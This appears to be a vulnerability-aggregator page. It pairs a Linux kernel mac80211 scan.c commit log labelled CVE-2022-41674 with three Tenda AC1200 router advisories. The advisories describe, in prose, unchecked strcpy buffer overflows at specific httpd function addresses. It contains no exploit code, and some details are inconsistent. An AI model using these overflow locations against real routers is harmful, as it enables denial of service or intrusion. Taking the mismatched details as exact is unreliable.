2012-12-11Merge branch 'for-john' of git://git.sipsolutions.net/mac80211-nextJohn W. Linville1\-1/+1 2012-12-10mac80211: a few whitespace fixesJohannes Berg1\-1/+1 2012-12-06Merge branch 'for-john' of git://git.kernel.org/pub/scm/linux/kernel/git/jber...John W. Linville1\-9/+12 2012-11-30mac80211: make ieee80211\_build\_preq\_ies saferJohannes Berg1\-9/+12 2012-11-26Merge branch 'for-john' of git://git.kernel.org/pub/scm/linux/kernel/git/jber...John W. Linville1\-8/+1 2012-11-23cfg80211: use DS or HT operation IEs to determine BSS channelJohannes Berg1\-8/+1 2012-11-21Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-1/+1 2012-10-31mac80211: init sched\_scan\_iesDavid Spinadel1\-1/+1 2012-10-18mac80211: add support for tx to abort low priority scan requestsSam Leffler1\-4/+17 2012-10-17mac80211: use channel contextsJohannes Berg1\-2/+2 2012-10-16mac80211: track whether to use channel contextsJohannes Berg1\-0/+4 2012-09-07net/mac80211/scan.c: removes unnecessary semicolonPeter Senna Tschudin1\-1/+1 2012-09-06mac80211: don't hang on to sched\_scan\_iesJohannes Berg1\-25/+14 2012-09-06Merge remote-tracking branch 'mac80211/master' into mac80211-nextJohannes Berg1\-2/+1 2012-08-20mac80211: pass channel to ieee80211\_send\_probe\_reqJohannes Berg1\-1/+2 2012-08-20mac80211: check operating channel in scanJohannes Berg1\-5/+4 2012-07-30mac80211: don't clear sched\_scan\_sdata on sched scan stop requestEliad Peller1\-1/+0 2012-07-30Merge remote-tracking branch 'wireless/master' into mac80211Johannes Berg1\-58/+65 2012-07-24mac80211: fix scan\_sdata assignmentJohannes Berg1\-1/+1 2012-07-20Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-54/+62 2012-07-12mac80211: add time synchronisation with BSS for assocJohannes Berg1\-1/+2 2012-07-12mac80211: redesign scan RXJohannes Berg1\-34/+23 2012-07-12mac80211: track scheduled scan virtual interfaceJohannes Berg1\-10/+10 2012-07-12mac80211: make scan\_sdata pointer usable with RCUJohannes Berg1\-9/+24 2012-07-12mac80211: fix invalid band deref building preq IEsArik Nemtsov1\-0/+3 2012-06-12Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-2/+2 2012-06-06mac80211: unify SW/offload remain-on-channelJohannes Berg1\-2/+2 2012-06-04net: Remove casts to same typeJoe Perches1\-2/+1 2012-05-09mac80211: Convert compare\_ether\_addr to ether\_addr\_equalJoe Perches1\-1/+1 2012-04-23mac80211: Support on-channel scan option.Ben Greear1\-26/+69 2012-04-13mac80211: remove ieee80211\_rx\_bss\_getMohammed Shafi Shajakhan1\-14/+0 2012-04-13mac80211: do not scan and monitor connection in parallelStanislaw Gruszka1\-1/+28 2012-03-28mac80211: fix oper channel timestamp updationRajkumar Manoharan1\-1/+1 2012-03-07mac80211: Filter duplicate IE idsPaul Stewart1\-20/+51 2012-03-05mac80211: use compare\_ether\_addr on MAC addresses instead of memcmpFelix Fietkau1\-1/+2 2012-01-05Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-1/+1 2012-01-04mac80211: fix scan state machineMohammed Shafi Shajakhan1\-1/+1 2011-12-19net: fix assignment of 0/1 to bool variables.Rusty Russell1\-1/+1 2011-11-30mac80211: revert on-channel work optimisationsJohannes Berg1\-2/+2 2011-11-22Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/torval...John W. Linville1\-0/+1 2011-11-11mac80211: simplify scan state machineJohannes Berg1\-122/+77 2011-10-31net: Add export.h for EXPORT\_SYMBOL/THIS\_MODULE to non-modulesPaul Gortmaker1\-0/+1 2011-10-25Merge branch 'pm-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/...Linus Torvalds1\-1/+1 2011-10-11mac80211: pass no-CCK flag through to HW scanJohannes Berg1\-0/+1 2011-09-27mac80211: Send the management frame at requested rateRajkumar Manoharan1\-1/+2 2011-08-25PM QoS: Move and rename the implementation filesJean Pihet1\-1/+1 2011-07-19mac80211: implement scan supported ratesJohannes Berg1\-3/+3 2011-07-11Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-1/+2 2011-07-07mac80211: fix ie memory allocation for scheduled scansLuciano Coelho1\-1/+2 2011-06-27mac80211: Drop DS Channel PARAM in directed probePaul Stewart1\-1/+2 2011-06-27mac80211: restrict advertised HW scan ratesJohannes Berg1\-2/+3 2011-06-17mac80211: add cancel\_hw\_scan() callbackEliad Peller1\-16/+21 2011-05-27mac80211: Remove duplicate linux/slab.h include from net/mac80211/scan.cJesper Juhl1\-1/+0 2011-05-16mac80211: abort scan\_work immediately when the device goes downRajkumar Manoharan1\-0/+5 2011-05-12cfg80211/mac80211: avoid bounce back mac->cfg->mac on sched\_scan\_stoppedLuciano Coelho1\-6/+27 2011-05-11mac80211: add support for HW scheduled scanLuciano Coelho1\-0/+99 2011-05-10mac80211: don't drop frames where skb->len < 24 in ieee80211\_scan\_rx()Luciano Coelho1\-1/+1 2011-03-07mac80211: fix scan race, simplify codeJohannes Berg1\-40/+24 2011-02-09mac80211: Ensure power-level set properly for scanning.Ben Greear1\-1/+8 2011-02-09mac80211: Allow scanning on existing channel-type.Ben Greear1\-4/+2 2011-02-04mac80211: Optimize scans on current operating channel.Ben Greear1\-25/+63 2011-01-21cfg80211: Extend channel to frequency mapping for 802.11jBruno Randolf1\-1/+2 2010-10-07mac80211: fix sw scan lockingJohannes Berg1\-2/+1 2010-10-06mac80211: avoid uninitialized var warning in ieee80211\_scan\_cancelJohn W. Linville1\-3/+4 2010-10-06mac80211: compete scan to cfg80211 if deferred scan fail to startStanislaw Gruszka1\-0/+2 2010-10-06mac80211: do not requeue scan work when not neededStanislaw Gruszka1\-12/+3 2010-10-06mac80211: assure we also cancel deferred scan requestStanislaw Gruszka1\-10/+25 2010-10-06mac80211: keep lock when calling \_\_ieee80211\_scan\_completed()Stanislaw Gruszka1\-36/+39 2010-10-06mac80211: reduce number of \_\_ieee80211\_scan\_completed callsStanislaw Gruszka1\-22/+29 2010-09-24mac80211: Add DS Parameter Set into Probe Request on 2.4 GHzJouni Malinen1\-1/+2 2010-09-24mac80211: Filter ProbeReq SuppRates based on TX rate maskJouni Malinen1\-1/+1 2010-08-27mac80211: allow scan to complete from any contextJohannes Berg1\-8/+26 2010-08-16mac80211: per interface idle notificationJohannes Berg1\-0/+2 2010-08-16mac80211: unify scan and work mutexesJohannes Berg1\-15/+15 2010-08-04mac80211: fix scan locking wrt. hw scanJohannes Berg1\-14/+0 2010-07-29mac80211: allow drivers to request DTIM periodJohannes Berg1\-0/+4 2010-07-28Revert "mac80211: fix sw scan bracketing"Luis R. Rodriguez1\-2/+2 2010-06-21mac80211: Fix compile warning in scan.c.Gertjan van Wingerde1\-1/+1 2010-06-18mac80211: fix sw scan bracketingJohannes Berg1\-2/+2 2010-05-20Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next-2.6Linus Torvalds1\-19/+107 2010-05-05Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-13/+40 2010-05-03mac80211: improve IBSS scanningJohannes Berg1\-1/+27 2010-04-28mac80211: do not wip out old supported ratesStanislaw Gruszka1\-10/+11 2010-04-27mac80211: give virtual interface to hw\_scanJohannes Berg1\-2/+2 2010-04-15Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-0/+2 2010-04-11Merge branch 'master' of master.kernel.org:/pub/scm/linux/kernel/git/davem/ne...David S. Miller1\-0/+1 2010-04-08mac80211: enhance tracingJohannes Berg1\-0/+2 2010-03-30include cleanup: Update gfp.h and slab.h includes to prepare for breaking imp...Tejun Heo1\-0/+1 2010-03-09mac80211: Improve software scan timingHelmut Schaa1\-6/+65 2010-02-08Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/linvil...John W. Linville1\-8/+19 2010-02-08mac80211: fix deferred hardware scan requestsJohannes Berg1\-8/+10 2010-01-26mac80211: wait for beacon before enabling powersaveJohannes Berg1\-4/+0 2010-01-12mac80211: add U-APSD client supportKalle Valo1\-0/+18 2010-01-12mac80211: fix a few work bugsJohannes Berg1\-0/+1 2010-01-06Revert "mac80211: replace netif\_tx\_{start,stop,wake}\_all\_queues"John W. Linville1\-5/+5 2010-01-05mac80211: No need to include WEXT headers hereJouni Malinen1\-1/+0 2009-12-28mac80211: Generalize off-channel operation helpers from scan codeJouni Malinen1\-150/+6

CVE-2022-41674: git/torvalds/linux.git - Linux kernel source tree

Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47ce00 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x47ce00, name is allocated a buffer of 0x1000 bytes for storing a variable. This value is passed to the 0x47bd44 (rtl\_hw\_add\_list) function for processing.

In 0x47bd44, the name is copied to new through strcpy. The buffer size allocated by new is 0x488. There is no length check for that before copying. This can lead to buffer overflows.

CVE-2022-41485: Bug-Report/tenda-AC6- 0x47ce00.md at main · Davidteeri/Bug-Report

Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x4a12cc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x4a12cc, the value of _src is obtained through websGerVar.

The _src is copied to info.urls via strcpy. However, the length of _src is not checked, the buffer of info is 0x254 bytes. This can lead to buffer overflows.

CVE-2022-41483: Bug-Report/tenda-AC6- 0x4212cc.md at main · Davidteeri/Bug-Report

Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47c5dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x47c5dc, take the content before ';' of recv_buf to pcVar2 through strchr. If the content is not empty, then take the content after the 'set' and store it in pcVar2.

Then use strchr to take the content after '=' of pcVar2 and store it in pvalue. But the length of pvalue is not checked and copied into value by strcpy. The length of value is 1024 bytes. The original recv_buf length is 4096 bytes, so the length of the pvalue may be greater than 1024 bytes. This results in a buffer overflow.

Tag

#wifi